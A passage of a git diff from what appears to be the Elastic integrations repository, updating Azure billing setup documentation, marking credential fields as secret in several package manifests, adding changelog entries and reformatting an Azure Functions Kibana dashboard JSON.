including details like subscription To use this integration you will need: -* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires the Billing Reader role to access the billing information for the subscription, department, or billing account. See more details in the [Setup section](#setup). +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires a role to access the billing information. The required role is different depending on the subscription, department, or billing account scope. Check the [Setup section](#setup) for more details. * **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. * **Payment method**: Azure Billing Metrics integration queries are charged based on the number of standard API calls. One integration makes two calls every 24 hours in the standard configuration. @@ -79,6 +79,10 @@ Take note of the content in the **Value** column in the **Client secrets** table #### Assign role +Assign a role to the App Registration depending on the scope you're interested in. + +To collect billing metrics from a single subscription, assign the **Billing Reader** to the App Registration on that subscription: + 1. In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. 1. Select the subscription to assign the application. 1. Select **Access control (IAM)**. @@ -90,10 +94,34 @@ Take note of the content in the **Value** column in the **Client secrets** table 1. Click the **Select** button. 1. Then click the **Review + assign** button. +You can use the department scope (EA accounts only) or the billing account scope (EA and MCA accounts) to collect billing metrics from multiple subscriptions. + +To collect billing metrics from a department (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Billing** > **Departments** and select the department you're interested in. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Department reader**. +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + +To collect billing metrics from a billing account (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Billing account reader** (view-only access). +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + Take note of the following values, which you will use later when specifying settings. -* `Subscription ID`: use the content of the "Subscription ID" you selected. -* `Tenant ID`: use the "Tenant ID" from the Azure Active Directory you use. +* `Tenant ID`: use the "Tenant ID" from your Microsoft Entra ID. +* Only one of the following: + * `Subscription ID`: use the "Subscription Id" content if you decide to collect metrics from a subscription. + * `Department Id`: use the "Department Id" content if you decide to collect metrics from a department. + * `Billing account ID`: use the "Billing account ID" content if you decide to collect metrics from a billing account. Your App Registration is now ready for the Elastic Agent. diff --git a/packages/azure_billing/manifest.yml b/packages/azure_billing/manifest.yml index 4967b2d61f9..04fd60f7678 100644 --- a/packages/azure_billing/manifest.yml +++ b/packages/azure_billing/manifest.yml @@ -1,6 +1,6 @@ name: azure_billing title: Azure Billing Metrics -version: "1.3.2" +version: "1.5.0" description: Collect billing metrics with Elastic Agent. type: integration icons: @@ -13,13 +13,13 @@ screenshots: title: App State Overview size: 5120x2562 type: image/png -format_version: "3.0.0" +format_version: "3.0.2" categories: - observability - azure conditions: kibana: - version: "^8.3.0" + version: "^8.12.0" elastic: subscription: "basic" vars: @@ -31,8 +31,9 @@ vars: required: true show_user: true - name: client_secret - type: text + type: password title: Client Secret + secret: true description: The secret key of the App Registration. multi: false required: true diff --git a/packages/azure_blob_storage/changelog.yml b/packages/azure_blob_storage/changelog.yml index 3b96289e39b..e7c2b03c646 100644 --- a/packages/azure_blob_storage/changelog.yml +++ b/packages/azure_blob_storage/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/azure_blob_storage/manifest.yml b/packages/azure_blob_storage/manifest.yml index 620746f4422..cec9a20ddd4 100644 --- a/packages/azure_blob_storage/manifest.yml +++ b/packages/azure_blob_storage/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_blob_storage title: Custom Azure Blob Storage Input description: Collect JSON data from configured Azure Blob Storage Container with Elastic Agent. type: integration -version: "1.0.1" +version: "1.1.0" conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" categories: - custom - cloud @@ -27,12 +27,13 @@ policy_templates: required: true show_user: true - name: service_account_key - type: text + type: password title: Service Account Key description: | This attribute contains the access key, found under the Access keys section on Azure Cloud, under the respective storage account. A single storage account can contain multiple containers, and they will all use this common access key. required: false show_user: true + secret: true - name: service_account_uri type: text title: Service Account URI diff --git a/packages/azure_frontdoor/changelog.yml b/packages/azure_frontdoor/changelog.yml index f7827fb9136..95c4f7a0305 100644 --- a/packages/azure_frontdoor/changelog.yml +++ b/packages/azure_frontdoor/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.7.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.6.1" changes: - description: Changed owners diff --git a/packages/azure_frontdoor/manifest.yml b/packages/azure_frontdoor/manifest.yml index 88d54c82992..34427459aaa 100644 --- a/packages/azure_frontdoor/manifest.yml +++ b/packages/azure_frontdoor/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_frontdoor title: "Azure Frontdoor" -version: "1.6.1" +version: "1.7.0" description: "This Elastic integration collects logs from Azure Frontdoor." type: integration categories: @@ -11,7 +11,7 @@ categories: - web conditions: kibana: - version: "^8.6.0" + version: "^8.12.0" screenshots: - src: /img/azure-frontdoor-overview.png title: Azure Frontdoor Overview @@ -57,11 +57,12 @@ policy_templates: required: true show_user: true - name: storage_account_key - type: text + type: password title: Storage Account Key multi: false required: true show_user: true + secret: true - name: resource_manager_endpoint type: text title: Resource Manager Endpoint diff --git a/packages/azure_functions/changelog.yml b/packages/azure_functions/changelog.yml index 032c6388a9a..905389c11a8 100644 --- a/packages/azure_functions/changelog.yml +++ b/packages/azure_functions/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: 0.4.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 0.3.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 0.3.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "0.2.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: 0.2.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/azure_functions/data_stream/functionapplogs/manifest.yml b/packages/azure_functions/data_stream/functionapplogs/manifest.yml index 757eec822bd..58644692675 100644 --- a/packages/azure_functions/data_stream/functionapplogs/manifest.yml +++ b/packages/azure_functions/data_stream/functionapplogs/manifest.yml @@ -25,6 +25,7 @@ streams: - name: connection_string type: password title: Connection String + secret: true multi: false required: true show_user: true @@ -41,6 +42,7 @@ streams: - name: storage_account_key type: password title: Storage Account Key + secret: true multi: false required: true show_user: true diff --git a/packages/azure_functions/data_stream/metrics/manifest.yml b/packages/azure_functions/data_stream/metrics/manifest.yml index c3dd002f4ae..3a924c18ed0 100644 --- a/packages/azure_functions/data_stream/metrics/manifest.yml +++ b/packages/azure_functions/data_stream/metrics/manifest.yml @@ -14,8 +14,9 @@ streams: required: true show_user: true - name: client_secret - type: text + type: password title: Client Secret + secret: true multi: false required: true show_user: true diff --git a/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json b/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json index 8789e027f33..c32950ad070 100644 --- a/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json +++ b/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json @@ -1,2317 +1,2461 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\",\"fieldName\":\"azure.resource.name\",\"title\":\"Filter by Function App\",\"enhancements\":{},\"selectedOptions\":[]}},\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\",\"fieldName\":\"azure.resource.group\",\"title\":\"Filter by resource group\",\"enhancements\":{}}}}" - }, - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T16:40:02.986Z", + "created_at": "2023-11-07T16:40:02.986Z", + "version": "WzkyLDFd", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\",\"fieldName\":\"azure.resource.name\",\"title\":\"Filter by Function App\",\"enhancements\":{},\"selectedOptions\":[]}},\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\",\"fieldName\":\"azure.resource.group\",\"title\":\"Filter by resource group\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f6c3c469-2e64-4120-b144-997fb70575e2": { + "columnOrder": [ + "b0f015a9-aab1-4b26-b28f-65ce55f354de" + ], + "columns": { + "b0f015a9-aab1-4b26-b28f-65ce55f354de": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Active Function Apps", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} } - } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "f6c3c469-2e64-4120-b144-997fb70575e2", + "layerType": "data", + "metricAccessor": "b0f015a9-aab1-4b26-b28f-65ce55f354de", + "showBar": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 6, + "i": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", + "w": 10, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f6c3c469-2e64-4120-b144-997fb70575e2": { - "columnOrder": [ - "b0f015a9-aab1-4b26-b28f-65ce55f354de" - ], - "columns": { - "b0f015a9-aab1-4b26-b28f-65ce55f354de": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Active Function Apps", - "operationType": "unique_count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {} - } - } - }, - "textBased": { - "layers": {} - } + "panelIndex": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", + "title": "Number of Active Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "Health Check Status indicates if there are any unhealthy instances and if they need replacing. A value of 100 means all instances of the App reported a healthy status. ", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "60014cf3-d9b4-46e8-ae69-999d31086fbc", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "113434b9-c581-4b79-9344-13864154c598": { + "columnOrder": [ + "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", + "8952901b-a1b3-4bb5-9605-c68a31cef340", + "6439d7ec-458f-4daf-a97a-101e6f025660" + ], + "columns": { + "6439d7ec-458f-4daf-a97a-101e6f025660": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.functions.health_check_status.avg: *" + }, + "isBucketed": false, + "label": "ExecutionCount", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.function_execution_count.total" + }, + "68c19ae2-0676-4b4a-90e7-c60d2ca556ac": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6439d7ec-458f-4daf-a97a-101e6f025660", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layerId": "f6c3c469-2e64-4120-b144-997fb70575e2", - "layerType": "data", - "metricAccessor": "b0f015a9-aab1-4b26-b28f-65ce55f354de", - "showBar": false - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", - "title": "Number of Active Function Apps", - "type": "lens", - "version": "8.7.1" + "8952901b-a1b3-4bb5-9605-c68a31cef340": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": "azure.functions.health_check_status.avg: *", + "disabled": false, + "index": "60014cf3-d9b4-46e8-ae69-999d31086fbc", + "key": "query", + "negate": false, + "type": "custom", + "value": "{\"bool\":{\"filter\":[{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"exists\":{\"field\":\"azure.functions.health_check_status.avg\"}}]}}],\"must\":[],\"must_not\":[],\"should\":[]}}" + }, + "query": { + "bool": { + "filter": [ + { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "exists": { + "field": "azure.functions.health_check_status.avg" + } + } + ] + } + } + ], + "must": [], + "must_not": [], + "should": [] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6439d7ec-458f-4daf-a97a-101e6f025660" + ], + "layerId": "113434b9-c581-4b79-9344-13864154c598", + "layerType": "data", + "seriesType": "line", + "splitAccessor": "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", + "xAccessor": "8952901b-a1b3-4bb5-9605-c68a31cef340" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "Health Check Status indicates if there are any unhealthy instances and if they need replacing. A value of 100 means all instances of the App reported a healthy status. ", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "Captures the number of execution of the function app. ", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b9d5606f-9607-4c90-a75f-c2857b266bfa", + "w": 15, + "x": 10, + "y": 0 + }, + "panelIndex": "b9d5606f-9607-4c90-a75f-c2857b266bfa", + "title": "Function Execution Count by Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8e323fe9-19c2-405d-bbf6-ba61dc9a190f": { + "columnOrder": [ + "c4d0be17-9d74-468d-8e55-a064664300d1", + "2cbcc3e5-5848-4a88-910b-7c845618ae2e", + "b37bb938-9515-453c-a5ff-f384a7351317", + "b37bb938-9515-453c-a5ff-f384a7351317X1", + "b37bb938-9515-453c-a5ff-f384a7351317X0", + "b37bb938-9515-453c-a5ff-f384a7351317X2" + ], + "columns": { + "2cbcc3e5-5848-4a88-910b-7c845618ae2e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total number of invocations", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.requests.total" + }, + "b37bb938-9515-453c-a5ff-f384a7351317": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Success Percentage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "60014cf3-d9b4-46e8-ae69-999d31086fbc", - "type": "index-pattern" + "formula": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", + "isFormulaBroken": false + }, + "references": [ + "b37bb938-9515-453c-a5ff-f384a7351317X2" + ], + "scale": "ratio" + }, + "b37bb938-9515-453c-a5ff-f384a7351317X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Success Percentage", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "azure.functions.http2xx.total" + }, + "b37bb938-9515-453c-a5ff-f384a7351317X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Success Percentage", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "azure.functions.requests.total" + }, + "b37bb938-9515-453c-a5ff-f384a7351317X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Success Percentage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "b37bb938-9515-453c-a5ff-f384a7351317X0", + "b37bb938-9515-453c-a5ff-f384a7351317X1" + ], + "location": { + "max": 73, + "min": 0 + }, + "name": "divide", + "text": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", + "type": "function" } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "113434b9-c581-4b79-9344-13864154c598": { - "columnOrder": [ - "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", - "8952901b-a1b3-4bb5-9605-c68a31cef340", - "6439d7ec-458f-4daf-a97a-101e6f025660" - ], - "columns": { - "6439d7ec-458f-4daf-a97a-101e6f025660": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "azure.functions.health_check_status.avg: *" - }, - "isBucketed": false, - "label": "ExecutionCount", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.function_execution_count.total" - }, - "68c19ae2-0676-4b4a-90e7-c60d2ca556ac": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "6439d7ec-458f-4daf-a97a-101e6f025660", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "8952901b-a1b3-4bb5-9605-c68a31cef340": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "references": [ + "b37bb938-9515-453c-a5ff-f384a7351317X0", + "b37bb938-9515-453c-a5ff-f384a7351317X1" + ], + "scale": "ratio" + }, + "c4d0be17-9d74-468d-8e55-a064664300d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top 10 Function Apps", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": "azure.functions.health_check_status.avg: *", - "disabled": false, - "index": "60014cf3-d9b4-46e8-ae69-999d31086fbc", - "key": "query", - "negate": false, - "type": "custom", - "value": "{\"bool\":{\"filter\":[{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"exists\":{\"field\":\"azure.functions.health_check_status.avg\"}}]}}],\"must\":[],\"must_not\":[],\"should\":[]}}" - }, - "query": { - "bool": { - "filter": [ - { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "exists": { - "field": "azure.functions.health_check_status.avg" - } - } - ] - } - } - ], - "must": [], - "must_not": [], - "should": [] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "6439d7ec-458f-4daf-a97a-101e6f025660" - ], - "layerId": "113434b9-c581-4b79-9344-13864154c598", - "layerType": "data", - "seriesType": "line", - "splitAccessor": "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", - "xAccessor": "8952901b-a1b3-4bb5-9605-c68a31cef340" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "c4d0be17-9d74-468d-8e55-a064664300d1", + "isTransposed": false + }, + { + "alignment": "left", + "colorMode": "cell", + "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", + "isTransposed": false, + "palette": { + "name": "positive", + "params": { + "stops": [ + { + "color": "#d6e9e4", + "stop": 20 + }, + { + "color": "#aed3ca", + "stop": 40 + }, + { + "color": "#85bdb1", + "stop": 60 + }, + { + "color": "#5aa898", + "stop": 80 + }, + { + "color": "#209280", + "stop": 100 + } + ] + }, + "type": "palette" }, - "description": "Captures the number of execution of the function app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "b9d5606f-9607-4c90-a75f-c2857b266bfa", - "w": 15, - "x": 10, - "y": 0 - }, - "panelIndex": "b9d5606f-9607-4c90-a75f-c2857b266bfa", - "title": "Function Execution Count by Function Apps", - "type": "lens", - "version": "8.7.1" + "summaryRow": "none" + }, + { + "alignment": "left", + "columnId": "b37bb938-9515-453c-a5ff-f384a7351317", + "isTransposed": false + } + ], + "layerId": "8e323fe9-19c2-405d-bbf6-ba61dc9a190f", + "layerType": "data" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8e323fe9-19c2-405d-bbf6-ba61dc9a190f": { - "columnOrder": [ - "c4d0be17-9d74-468d-8e55-a064664300d1", - "2cbcc3e5-5848-4a88-910b-7c845618ae2e", - "b37bb938-9515-453c-a5ff-f384a7351317", - "b37bb938-9515-453c-a5ff-f384a7351317X1", - "b37bb938-9515-453c-a5ff-f384a7351317X0", - "b37bb938-9515-453c-a5ff-f384a7351317X2" - ], - "columns": { - "2cbcc3e5-5848-4a88-910b-7c845618ae2e": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total number of invocations", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.requests.total" - }, - "b37bb938-9515-453c-a5ff-f384a7351317": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Success Percentage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", - "isFormulaBroken": false - }, - "references": [ - "b37bb938-9515-453c-a5ff-f384a7351317X2" - ], - "scale": "ratio" - }, - "b37bb938-9515-453c-a5ff-f384a7351317X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Success Percentage", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "azure.functions.http2xx.total" - }, - "b37bb938-9515-453c-a5ff-f384a7351317X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Success Percentage", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "azure.functions.requests.total" - }, - "b37bb938-9515-453c-a5ff-f384a7351317X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Success Percentage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "b37bb938-9515-453c-a5ff-f384a7351317X0", - "b37bb938-9515-453c-a5ff-f384a7351317X1" - ], - "location": { - "max": 73, - "min": 0 - }, - "name": "divide", - "text": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", - "type": "function" - } - }, - "references": [ - "b37bb938-9515-453c-a5ff-f384a7351317X0", - "b37bb938-9515-453c-a5ff-f384a7351317X1" - ], - "scale": "ratio" - }, - "c4d0be17-9d74-468d-8e55-a064664300d1": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Top 10 Function Apps", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "description": "Shows the number of successful invocations as a percentage of the total invocations per function app. ", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "44c459b4-623b-4534-ba78-8904669ae9cb", + "w": 23, + "x": 25, + "y": 0 + }, + "panelIndex": 